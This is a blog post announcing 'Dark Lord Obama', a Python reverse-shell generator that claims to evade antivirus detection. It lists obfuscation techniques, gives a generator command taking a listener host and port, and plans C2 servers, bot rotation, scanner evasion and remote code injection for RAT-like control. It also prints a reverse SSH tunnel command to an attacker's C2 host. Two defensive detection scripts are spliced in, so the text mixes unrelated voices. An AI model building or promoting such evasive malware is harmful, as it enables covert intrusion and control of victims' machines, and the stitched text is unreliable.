Introducing Dark Lord Obama: Undetectable (as of 7/29/2019) Pythonic Payload Generator

Introducing Dark Lord Obama, undetectable on VirusTotal as of July 29th, 2019. I was so emboldened that I actually went ahead and submitted the entire file knowing that upon suspicion and/or detection the news would have passed through all the antivirus vendors, including Microsoft Windows Defender. In other words, if I failed, the fires on the watchtowers would have all been lit.

https://github.com/tanc7/dark-lord-obama

DLO generates a Pythonic reverse shell that as of July 29th, 2019, is undetectable on VirusTotal.

It combines multiple techniques that will not be disclosed in detail, including but not limited to:

1. “Command Segmentation”
2. “AES Encryption” with a 32-bit key and a 16-bit initialization vector
3. Base64 Encoding – It was a necessity
4. Inline Python exec() functions, C asm() functions (will be added soon), Java/Jython, Cython, Ctypes
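The techniques listed above leave static traces in a Python source file even when the decoded code itself is unreadable: a base64 decode, an AES decrypt call, an inline `exec()`, `ctypes`, and (on one plausible reading of "command segmentation") short string fragments joined back together at runtime. The following added example, which is not code from the DLO project, scores a Python source text on those co-occurring indicators so a defender can triage scripts before running them. The regexes, weights, threshold, and the three sample sources are assumptions constructed for this example.

```python
"""Static indicator scoring for Python source that reassembles and runs
code at runtime. Added example for defenders, not code from the DLO
project; indicators, weights, threshold and samples are assumptions."""
import re

# (name, pattern, weight). Weights are assumptions, not measured values.
INDICATORS = [
    ("exec_call", re.compile(r"\bexec\s*\("), 3),
    ("b64_decode", re.compile(r"\bb64decode\s*\("), 2),
    ("aes_cipher", re.compile(r"\bAES\.new\s*\(|\bfrom\s+Crypto(?:dome)?\.Cipher\b"), 2),
    ("ctypes", re.compile(r"\bimport\s+ctypes\b|\bctypes\."), 2),
    ("socket_or_subprocess", re.compile(r"\bsocket\.socket\s*\(|\bsubprocess\.(?:Popen|call|run)\b"), 1),
    ("long_b64_literal", re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"), 2),
    # four or more short quoted fragments joined with "+": a segmented command
    ("string_concat_chain", re.compile(r"(?:\+\s*['\"][^'\"]{1,8}['\"]\s*){4,}"), 2),
]
THRESHOLD = 6  # assumption: exec() plus one strong indicator, or several weaker ones


def scan_source(src: str) -> dict:
    """Score one source text; returns per-indicator hit counts, total score and a verdict."""
    hits = {}
    for name, pattern, _ in INDICATORS:
        count = len(pattern.findall(src))
        if count:
            hits[name] = count
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return {"hits": hits, "score": score, "suspicious": score >= THRESHOLD}


# --- constructed samples (not real payloads) ---------------------------------
BENIGN_SAMPLE = (
    "import base64, json\n"
    "def load_settings(raw):\n"
    "    return json.loads(base64.b64decode(raw))\n"
    "def logo_data_uri(png_bytes):\n"
    "    return 'data:image/png;base64,' + base64.b64encode(png_bytes).decode()\n"
)

_B64_FILLER = "QUJD" * 60  # 240 base64 characters of filler, not a real ciphertext
SUSPICIOUS_SAMPLE = (
    "import base64, socket\n"
    "from Crypto.Cipher import AES\n"
    "key = b'0' * 32\n"
    "iv = b'1' * 16\n"
    f"blob = '{_B64_FILLER}'\n"
    "s = socket.socket()\n"
    "code = AES.new(key, AES.MODE_CBC, iv).decrypt(base64.b64decode(blob))\n"
    "exec(code)\n"
)

SEGMENTED_SAMPLE = (
    "import ctypes\n"
    "part = 'pr' + 'in' + 't(' + '42' + ')'\n"
    "exec(part)\n"
)

if __name__ == "__main__":
    for label, sample in [("benign", BENIGN_SAMPLE),
                          ("decode-then-exec", SUSPICIOUS_SAMPLE),
                          ("segmented", SEGMENTED_SAMPLE)]:
        print(label, scan_source(sample))
```

The benign sample scores only on `b64decode` and stays under the threshold, while the decode-then-exec sample trips five indicators at once; the point is that no single indicator is damning, but their co-occurrence in one short file is. Tune the weights against your own code base before using the verdict for anything beyond triage.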

Here is proof with my SHA256Sums.

# Current usage

Currently it only works on targets that run Python. A cross-compilable and transpilable edition is in the works after DEFCON and after I pass the OSCP.

`python darklordobama-generator.py <LHOST> <LPORT>`

# Incoming features

1. Cross-compilation – Ideal target platforms: Android, iOS, MacOS (already possible with py2app), Windows (requires transpiling it back to a lower-level language like C, C#, or Visual C++), and ARM/MIPS-based routers and IoT devices
2. C2 Server – Encrypts a whole TLS 1.3 certificate within the payload and attempts to negotiate a TLS session with the Command-and-Control Server. The payload does not hold the key or IV; the server sends a CHALLENGE string containing them, which the payload uses to decrypt the TLS cert. If an IP or host fails to present the correct TLS certificate during the handshake, the C2 Server immediately issues a permanent-ban rule in iptables (DROP packets), designed to thwart Shodan’s malware hunter https://malware-hunter.shodan.io/
3. “Steroid Injections” – Rewritable sections of memory occupied by the payload, using statically defined functions, built-in reverse-SSH tunnels, and SocketServer. Instantly grant your payload new abilities without having to touch the disk again (it modifies a function that holds a 5,000-byte buffer of \x90 NOP instructions and then lets you CALL it). This is NOT a buffer overflow; rather, it is a set of pre-allocated rewritable functions that can be called after raw binary data is downloaded via the self-contained SocketServer module.
4. Dynamic DNS Support – With a built-in DNS resolver to ensure that you always use public DNS (1.1.1.1 or 8.8.8.8) to evade corporate DNS whitelisting
5. C2_Rotate Function – Using Ansible, Tensorflow, and Python, automate spinning up brand-new Command-and-Control Servers and immediately push a mass update to all current bots to “rotate” to the new VPS. Requires a Dynamic DNS subscription.
6. Built-in SSH client – Allows your payloads to create reverse SSH tunnels out of restrictive firewalls (like a home NATed router)
7. ASM Interpreter – Run x86 assembly instructions or launch object .o files, and let attackers manually run their own shellcode generated with msfvenom, right through the session
8. Pluggable Transport Support – Using Golang’s offerings of GQUIC, Scramblesuit, Obfs4
9. VPN Support – Wireguard, OpenVPN, IPSEC-IKEv2
10. Built-in Tunneling Modules – Support for Iodine, Dnscat2, HTTPTunnel, Ncat, TorTunnel
11. Tor/I2P Navigation – Normally reverse shells cannot navigate the .onion network if they are only configured for IPv4/IPv6. A shell would land and the payload would run, but it would never connect back (tested on TAILS)

Currently the shell is a proof-of-concept showing that I successfully evaded all common static binary analysis techniques.

# Steroid-Injector Module Explained (Upcoming Update)

This module is relatively simple: it just calls Python’s exec function or C’s inline assembly after receiving raw platform code from the Command-and-Control Server. That SocketServer-based connection is actually a second listener port that has been opened on the victim.

Now normally, you wouldn’t be able to reach a machine with that SocketServer listening when it is sitting behind a router/NAT on a public IP. But if you have remote access through the reverse shell, you can simply open a reverse SSH tunnel back to your C2 server so that the listener is bound locally there, with the command:

`ssh -Nf root@attackerc2 -R 8443:127.0.0.1:9999`

This means that the victim’s SocketServer is now reachable by simply logging into your C2 and then using our future injector.py module to connect to root@localhost:9999, sending your desired instructions, letting DLO ingest them, and then calling them from an interactive menu, like a function.
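From the defender's side, the reverse tunnel described above is visible on the compromised host as an outbound `ssh` process carrying a `-R` remote-forward option, usually together with `-N` (no command) and `-f` (background). The following added example, which is not code from the DLO project, parses `ps`-style process listings and flags exactly that combination while leaving ordinary local forwards (`-L`) and the sshd daemon alone. The process list is constructed for this example (the `attackerc2` name comes from the command above; `203.0.113.5` is a documentation address), and the set of OpenSSH options that take a value is an assumption that covers the common client flags.

```python
"""Flag ssh client processes that set up reverse port forwards (-R).
Added example for host-side detection; not part of the DLO project.
Input is constructed `ps -eo pid,user,args` style output."""
import os
import shlex

# OpenSSH client options that consume a value (assumption; covers the usual flags).
ARG_FLAGS = set("RLDpiolWJbceFImOQSwEB")

# Constructed sample of `ps -eo pid,user,args` output (not real process data).
PS_SAMPLE = """\
  PID USER     COMMAND
  412 root     /usr/sbin/sshd -D
 1337 www-data ssh -Nf root@attackerc2 -R 8443:127.0.0.1:9999
 1402 alice    ssh -L 5432:db.internal:5432 alice@bastion
 1533 alice    python3 -m http.server 8000
 1601 bob      ssh -fN -R 2222:localhost:22 bob@203.0.113.5
"""


def parse_ssh_args(argv):
    """Split an ssh argv into (boolean flags, {value-flag: [values]}).

    Handles clustered booleans such as -Nf and a value given either as the
    rest of the token (-R8443:...) or as the following token (-R 8443:...).
    """
    flags, values = set(), {}
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-") and len(tok) > 1 and not tok.startswith("--"):
            j = 1
            while j < len(tok):
                ch = tok[j]
                if ch in ARG_FLAGS:
                    if j + 1 < len(tok):
                        val = tok[j + 1:]
                    else:
                        i += 1
                        val = argv[i] if i < len(argv) else ""
                    values.setdefault(ch, []).append(val)
                    break
                flags.add(ch)
                j += 1
        i += 1
    return flags, values


def find_reverse_tunnels(ps_output: str):
    """Return one finding per ssh process that requests a remote forward."""
    findings = []
    for line in ps_output.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, cmd = parts
        argv = shlex.split(cmd)
        if not argv or os.path.basename(argv[0]) != "ssh":
            continue
        flags, values = parse_ssh_args(argv)
        if "R" not in values:
            continue
        findings.append({
            "pid": int(pid),
            "user": user,
            "remote_forwards": values["R"],
            # -N/-f together mean "no shell, go to background": a tunnel-only session
            "background": bool({"N", "f"} & flags),
        })
    return findings


if __name__ == "__main__":
    for f in find_reverse_tunnels(PS_SAMPLE):
        print(f"pid={f['pid']} user={f['user']} -R {f['remote_forwards']} background={f['background']}")
```

On a real host, feed it the output of `ps -eo pid,user,args` and treat a `-R` forward started by a service account such as `www-data` as a high-priority alert; a developer's interactive `-L` forward produces no finding. Because the option parser is written for the OpenSSH client, wrappers or other SSH implementations would need their own handling.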

The design is in the drafts, but I plan to have the SocketServer and incoming TCP connections work in this format: `CMD-Header (inject, delete, call) – INCOMING INSTRUCTIONS (LENGTH) – <Python, C, or ASM instructions>`. My initial draft has ten overwritable buffers inside callable functions, each 5,000 bytes long, and with a certain header you can bridge multiple functions and call them together, for particularly big applications that you are trying to push to your bots.

I have yet to convert it into a full-blown Remote Access Trojan (Meterpreter, Pupy, Beacon, Empire agent etc.), however once I get the Steroid-Injector module written, you can give the shell RAT-like capabilities, since you can remotely upload Python, C, or Assembly instructions and make it do anything you want. That’s my priority update.
